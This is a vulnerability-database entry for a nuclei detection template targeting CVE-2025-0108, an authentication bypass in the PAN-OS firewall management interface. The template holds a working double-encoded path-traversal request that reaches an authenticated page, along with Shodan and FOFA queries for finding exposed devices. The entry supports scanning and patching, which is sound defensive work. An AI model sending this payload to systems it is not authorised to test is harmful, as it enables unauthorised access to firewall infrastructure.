PAN-OS Management Interface - Path Confusion to Authentication Bypass

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType

nuclei🔗 github.com👁 213 Views

Vulnerability in PAN-OS allows authentication bypass via path confusion between Nginx and Apache handlers.

Reporter	Title	Published	Views	Family All 34
GithubExploit	Exploit for Missing Authentication for Critical Function in Paloaltonetworks Pan-Os	19 Feb 202506:19	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Paloaltonetworks Pan-Os	19 Jun 202512:19	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Paloaltonetworks Pan-Os	18 Feb 202521:04	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Paloaltonetworks Pan-Os	19 Feb 202506:19	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Paloaltonetworks Pan-Os	19 Feb 202516:00	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Paloaltonetworks Pan-Os	14 Feb 202513:22	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Paloaltonetworks Pan-Os	13 Feb 202506:39	–	githubexploit
ATTACKERKB	CVE-2025-0108	12 Feb 202500:00	–	attackerkb
Information Security Automation	About Authentication Bypass – PAN-OS (CVE-2025-0108) vulnerability	27 Feb 202510:32	–	avleonov
Information Security Automation	March episode “In the Trend of VM” (#13): vulnerabilities of Microsoft, PAN-OS, СommuniGate and who should patch hosts with deployed application	22 Apr 202512:51	–	avleonov

Source	Link
slcyber	www.slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/

id: CVE-2025-0108

info:
  name: PAN-OS Management Interface - Path Confusion to Authentication Bypass
  author: halencarjunior,ritikchaddha
  severity: critical
  description: |
    A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header.
  impact: |
    Unauthenticated attackers can exploit path confusion between Nginx and Apache to bypass authentication completely, gaining unauthorized access to the PAN-OS management interface and potentially compromising the entire firewall infrastructure.
  remediation: |
    Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/
  classification:
    epss-score: 0.98338
    epss-percentile: 0.99909
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-0108
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
  tags: cve,cve2025,panos,auth-bypass,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221008621adc83790b8d8d693ea9d4c66c0d05e57082f6ede0046edd46a72a26aef1f022036aa233e80612068fd0d74c57a25137f6afbf274d4aa5f6c2d3549279bc42ece:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

8.3High risk

Vulners AI Score8.3

CVSS 3.19.1

CVSS 48.8

EPSS0.98338

SSVC